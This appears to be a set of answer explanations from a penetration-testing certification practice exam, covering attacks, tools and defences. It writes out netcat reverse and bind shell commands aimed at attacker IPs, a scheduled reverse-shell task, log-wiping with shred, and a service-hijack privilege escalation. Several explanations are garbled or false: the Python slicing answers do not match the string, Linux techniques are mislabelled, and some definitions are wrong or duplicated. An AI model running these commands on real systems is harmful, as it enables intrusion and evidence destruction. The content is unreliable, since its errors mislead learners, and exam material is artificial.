OBJ-3.5: The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker’s machine at 172.16.34.12 over port 443.

OBJ-3.5: The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1, and 10 that stores users’ passwords. It authenticates local and remote users. The SAM uses cryptographic measures to prevent unauthenticated users from accessing the system but could be cracked offline using a password cracker to determine the administrative user’s passwords. Ret2libc, sticky bits, and SUID/SGID programs are WindLinuxows-specific privilege escalation techniques.

OBJ-3.7: The attacker issued attempted to overwrite the /var/log/syslog file. If this command were successful, they would have overwritten all of the log’s contents with a single space character. If the server writes its logs to a centralized Syslog server, the original logs would still be available for review. Additionally, this method does not securely erase the file, and it could be restored from a backup or even from the hard drive using forensic techniques. If the attacker wanted to erase the file securely, they should have used the “shred -zu /var/log/syslog” command. This would overwrite the area of the hard drive that contained the file with zeros for increase security.

OBJ-3.5: Some Windows services are run with SYSTEM privileges and may have been misconfigured by the administrator. In this case, Jason used the accesschk tool from SysInternals to find any writeable services that his user account could access. One was returned: Apache. He then stopped the service and rewrote the binary path loaded by the service to “net localgroup administrators jason /add”, which will be run the next time the service is started. This will add Jason’s user account (jason) to the administrators group. Next, he started the service, completing his privilege escalation through the use of writeable services.

OBJ-3.5: An insecure sudo vulnerability could allow an attacker to circumvent protections and execute commands that would normally require a password, resulting in privilege escalation. Kerberoasting, Cpassword, and DLL hijacking are Windows-specific privilege escalation techniques.

OBJ-3.1: Whaling is a type of spear phishing attack that specifically targets wealthy or powerful individuals. In penetration testing, when the attacker targets a C-level executive (CEO, CFO, CTO, CIO, etc.), this is considered whaling.

OBJ-3.2: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forcing legitimate MAC addresses out of the table of contents in the switch and forcing a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch table of contents is flooding with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router’s broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address.

OBJ-3.2: Server Message Block (SMB) allows clients to read from and write to a server service, providing core authentication and communications for Windows file and print servers. The EternalBlue exploit was released in early 2017, and it can be used against Windows (Vista SP2 through Server 2016, both 32-bit and 64-bit versions).

OBJ-3.1: Impersonation is the act of pretending to be someone you are not. Elicitation is the collection or acquisition of data from human beings, usually through deception or social engineering. These two are often used together in an attack. Since the penetration tester is trying to gather the CFO’s login credentials, they are likely trying to perform an account takeover to conduct an impersonation attack using a business email compromise (BEC) to elicit some action from personnel within the organization. The Social Engineer Toolkit (SET) is an open-source penetration testing framework included with Kali Linux that supports social engineering to penetrate a network or system.

OBJ-3.4: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. The injection of unintended XML content and/or structures into an XML message can alter the application’s intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.

OBJ-3.5: An advanced persistent threat (APT) is a stealthy computer network threat actor, typically a nation-state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. APTs usually send encrypted traffic so that they are harder to detect through network traffic analysis or network forensics. This means that you need to focus on the endpoints to detect an APT. Unfortunately, APTs are very sophisticated, so endpoint behavioral analysis is unlikely to detect them easily, so Sarah will need to conduct endpoint forensics as her most likely method to detect an APT and their associated infections on her systems.

OBJ-3.1: A zero-day vulnerability refers to a hole in software unknown to the vendor and newly discovered. This security hole can become exploited by hackers before the vendor becomes aware of it and can fix it. An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field that is successful due to an input validation flaw. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. The time of check to time of use is a class of software bug caused by changes in a system between checking a condition (such as a security credential) and using the check’s results and the difference in time passed. This is an example of a race condition.

OBJ-3.2: Pass the Hash (PtH) is the process of harvesting an account’s cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.

OBJ-3.6: Radio-frequency identification (RFID) is a standard for identifying and keeping track of an object’s physical location through the use of radio waves. RFID cloning is the act of copying authentication data from an RFID badge’s microchip to another badge. In an attack scenario, badge cloning is useful because it enables the attacker to obtain authorization credentials without stealing a physical badge from the organization. Badge cloning can be done through handheld RFID writers, which are inexpensive and easy to use. You hold the badge up to the RFID writer device, press a button to copy its tag’s data, then hold a blank badge up to the device, and write the copied data. RFID cloning tools can read the data like any normal RFID reader would and be located up to several feet away or inside a bag.

OBJ-3.2: ARP poisoning reroutes data and allows an attacker to intercept packets of data intended for another recipient. ARP attacks can be sent from any host on the local area network, and the goal is to associate the host so that any traffic meant for something else will instead go directly to the attacker’s PC.

OBJ-3.1: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

OBJ-3.7: This scenario is using a command to add persistence to a Windows server using PowerShell. The command entered adds a new service named Skillcertpro Training App with the binary listed in the command. This will add persistence to the system by running the Skillcertpro Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

OBJ-3.2: A Distributed Denial of Service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system or network. DoS and Spoofing attacks originate from a single host, while wardriving is focused on the surveillance and reconnaissance of wireless networks.

OBJ-3.1: Whaling occurs when the attacker targets the C-level executives (CEO, CFO, CIO, etc.), board members, and other senior executives within the organization.

OBJ-4.3: A reverse shell is established when the target machines communicate with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command “nc -lp 31337” on it. To connect to the attacking machine from the victim machine, you would enter the command “nc 192.168.1.53 31337 –e /bin/sh” on it. A bind shell is established when a victim system “binds” its shell to a local network port. To achieve this using netcat, you should execute the command “nc -lp 31337 -e /bin/sh” on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command “nc 192.168.1.53 31337” to connect to the victim’s bind shell.

OBJ-4.2: Nessus is a popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

OBJ-4.3: This output from the tcpdump command is displaying three packets in a larger sequence of events. Based solely on these three packets, we can only be certain that the server (11.154.12.121) runs an SSH server over port 22. This is based on the first line of the output. The second and third lines are the server responding to the request and sending data back to the client (10.0.19.121) over port 52497. There is not evidence of an attack against either the server or the client based on this output since we can only see the headers and not the content being sent between the client and server.

OBJ-4.2: Cain and Abel is a popular password cracking tool. It can recover many password types using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

OBJ-4.2: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

OBJ-4.1: The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you d not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using an SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan. The -O flag would conduct an operating system detection scan of the target system.

OBJ-4.2: Burp Suite is an integrated platform included for testing web applications’ security by acting as a local proxy so that the attacker can capture, analyze, and manipulate HTTP traffic. SET (Social Engineer Toolkit) is an open-source penetration testing framework included with Kali Linux that supports social engineering to penetrate a network or system. Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. Proxychains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Censys is a search engine that returns information about the types of devices connected to the Internet.

OBJ-4.4: When evaluating the code s[1:12:3], you would receive “iTin” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “SkillcertproTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. For example, if you enter s[5], you would receive the letter “r” in response. The format for the array is [start:end:increment], so s[1:12:3] is evaluated as starting with the 1st position (i in Skillcertpro since computers start counting at 0), count by three until you reach the 12th position (. In SkillcertproTraining.com). This would display the 1st position (i), 4th position (T), 7th position (i), 10th position (n), and then stop. This is because the command said to stop at the 12th position, but our next position to display would have been 13 when incrementing by 3 each time.

OBJ-4.2: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. OpenVas, SET, and Aircrak-NG are not considered OSINT tools. OpenVas is a vulnerability scanner. SET is a social engineering tool. Aircrack-NG is a wireless hacking tool.

OBJ-4.3: Password spraying refers to the attack method that takes many usernames and loops them with a single password. We can use multiple iterations using many different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraud. Credential stuffing is the automated injection of breached username/password pairs to gain user accounts access fraudulently. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack for their own purposes. Session hijacking exploits a valid computer session to gain unauthorized access to information or services in a computer system.

OBJ-4.3: The least complex password of these four options is ujepmnxf. All four passwords are eight characters, so the least complex password will be the one that uses the smallest character set. As shown in the password 4@kn?Q9$, there are four character types: uppercase letters, lowercase letters, numbers, and symbols. The least complex password only uses one of these character types. Therefore, the password ujepmnxf is the least complex and least secure password since it only includes lowercase letters.

OBJ-4.3: This appears to be normal network traffic. The first line shows that a DNS lookup was performed for a website (test.skillcertprotraining.com). The second line shows the response from the DNS server with the IP address of the website. The third line begins a three-way handshake between an internal host and the website. The fourth line is the SYN-ACK response from the website to the internal host as part of this handshake. The fifth line is a standard Windows NetBIOS query within the local area network to translate human-readable names to local IP addresses. The sixth and seventh lines appear to be inbound requests to port 443 and port 8080, both of which were sent the RST by the internal host’s firewall since it is not running those services on the host. None of this network traffic appears to be suspicious.

OBJ-4.4: When evaluating the code s[4:9], you would receive “Train” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “SkillcertproTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. For example, if you enter s[5], you would receive the letter “r” in response. The format for the array is [start:end:increment], so s[4:9] is evaluated as starting with the 4th position (T in SkillcertproTraining.com since computers start counting at 0) and continuing to display letters until it reaches the 9th position (the second letter i in Training). This is because it treats ranges as the start value and the value to stop when it reaches it, similar to a for loop. If we wanted that “I” to be displayed as well, we would need to stop at 10 instead of 9. Since there is no increment provided in this argument, it uses the default of 1 position at a time, moving from left to right as it counts upward through the string.

OBJ-5.3: Persistent MAC learning, also known as Sticky MAC, is a port security feature that enables an interface to retain dynamically learned MAC addresses when the switch is restarted or if the interface goes down and is brought back online. This is a security feature that can be used to prevent someone from unplugging their office computer and connecting their own laptop to the network jack without permission since the switch port connected to that network jack would only allow the computer with the original MAC address to gain connectivity using Sticky MAC.

OBJ-5.3: Jeff should immediately change the repository from public to private to prevent further exposure of the source code. Deleting the repository would also fix the issue but could compromise the company’s ongoing business operations. Reevaluation of the company’s information management policies should be done, but this is not as time-critical as changing the repository’s public/private setting. Once the repository is configured to be private, then Jeff should investigate any possible compromises that may have occurred and reevaluate their policies.

OBJ-5.3: Password policies often enforce a mixture of standard character types, including uppercase letters, lowercase letters, numbers, and symbols. The option ‘pa55word’ is the weakest choice since it only includes lowercase letters and numbers. The option ‘Pa55w0rd’ is slightly more complex since it includes uppercase letters, lowercase letters, and numbers. The option ‘P@$$W0RD is also similar in complexity since it includes uppercase letters, numbers, and special characters. The most secure option is ‘P@5$w0rd’ since it includes a mixture of uppercase letters, lowercase letters, numbers, and special characters.

OBJ-5.2: This scenario is using a chained command to remove persistence from a Windows server using PowerShell. The command entered removes a service named Skillcertpro Training App. The command uses Get-Service to get an object representing the Skillcertpro Training App service using the display name. The pipeline operator (|) pipes the object to Remove-Service, which removes the service. This will remove any persistence gained by running the Skillcertpro Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

OBJ-5.4: De-confliction is the process of avoiding an early conclusion to an engagement by coordinating the penetration testing team’s efforts amongst themselves or with a few key trusted personnel in the client organization. If the penetration tester did not create the account, then the trusted agent would have begun an incident response to hunt down and clear the cause of a new administrative account being created. If this occurred, the penetration test would have been stopped or paused during this incident response.

OBJ-5.3: All possible solutions can be categorized as People, Process, or Technology solutions.

OBJ-5.3: A mantrap is a device that only allows a single person to enter per authentication. This authentication can be done by RFID, a PIN, or other methods. Once verified, the mantrap lets a single person enter through a system, such as a turnstile or rotating door. CCTV will not stop piggybacking, but it could be used as a detective control after an occurrence. Wearing security badges is useful, but it won’t stop piggybacking by a skilled social engineer. RFID badges may be used as part of your entry requirements, but it won’t stop a determined piggyback who follows an employee into the building after their authenticated RFID access has been performed.

OBJ-5.1: An organization’s willingness to tolerate risk is known as its risk appetite. If you determine that you have a greater risk appetite for a certain system or function of the business, you may choose to scan less it frequently, for example. If you have a low-risk appetite, you will place a higher amount of resources towards defending and mitigating your systems. Risk avoidance is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk deterrence is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk transference moves or shares the responsibility of risk to another entity.

OBJ-5.2: Pentesters rarely need to modify log files, and it should not be conducted after an assessment/engagement has occurred. When an assessment is complete, the pentester should remove any shells, tester-created credentials, or tools from the victimized hosts to ensure an attacker does not utilize them against the organization, too.

OBJ-5.3: Linux systems use the sshd (SSH daemon) to provide ssh connectivity. If Tim changes the sshd_config to deny root logins, it will still allow any authenticated non-root user to connect over ssh. The sshd service has a configuration setting that is named PermitRootLogin. If you set this configuration setting to no or deny, all root logins will be denied by the ssh daemon. If you didn’t know about this setting, you could still answer this question by using the process of elimination. An iptables rule is a Linux firewall rule, and this would block the port for ssh, not the root login. Adding root to the sudoers group won’t help either since the sudoers group allows users to login as root. If you have a network IPS rule to block root logins, the IPS would have to see the traffic being sent within the SSH tunnel. This is not possible since SSH connections are encrypted end-to-end by default. Therefore, the only possible right answer is to change the sshd_config setting to deny root logins.

OBJ-5.3: Since the question asks you to prevent unauthorized service access, we need to block port 3389 from accepting connections on 71.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over the Remote Desktop Protocol service that is unauthorized (port 3389).

OBJ-5.4: OpenIOC is essentially just a flat database of known indicators of compromise. The MITRE ATT&CK provides additional details about detection and mitigation. The Diamond model is an analytic framework for describing an attacker’s work. Lockheed Martin’s cyber kill chain provides a generalized concept for how an attacker might approach a network but does not deal with individual IOCs’ specifics.

OBJ-5.3: The power level should be reduced for the radio transmitter in the wireless access points. With a reduced power level, the signal will not travel as far, which can ensure the signal remains within the building’s interior only. The other options, if changed, would affect the availability of the network to the currently configured users and their devices.

OBJ-5.3: Port 22 uses SSH to authenticate a remote computer or user, or in this case, an administrator. Even if the router has been compromised, the new full rights user will not access their new account without the SSH key, which could only be provided by a true administrator. Telnet uses port 23 and passes all information as unencrypted traffic on the network. Telnet should always be disabled for security reasons, and SSH (which uses encryption) should be used instead.

OBJ-2.2: Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results. Non-credentialed scans rely on external resources for configuration settings that can be altered or incorrect. The scanner’s network location does not directly impact the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.

OBJ-1.3: Penetration testing can form the basis of functional exercises. One of the best-established means of testing a security system for weaknesses is to play “war game” exercises in which the security personnel split into teams: red, blue, and white. The red team acts as the adversary. The blue team acts as the defenders. The white team acts as the referees and sets the parameters for the exercise. The yellow team is responsible for building tools and architectures in which the exercise will be performed.

OBJ-1.3: The time of day used for conducting the test is critically important based on this engagement’s goals. This engagement seeks to determine if their LMS can quickly scale up in response to increase student demand. This is not just a bandwidth test or simple load test, but they also want to determine if the customer/student experience is affected. To determine that, the engagement must occur while many real students are also online and taking the courses.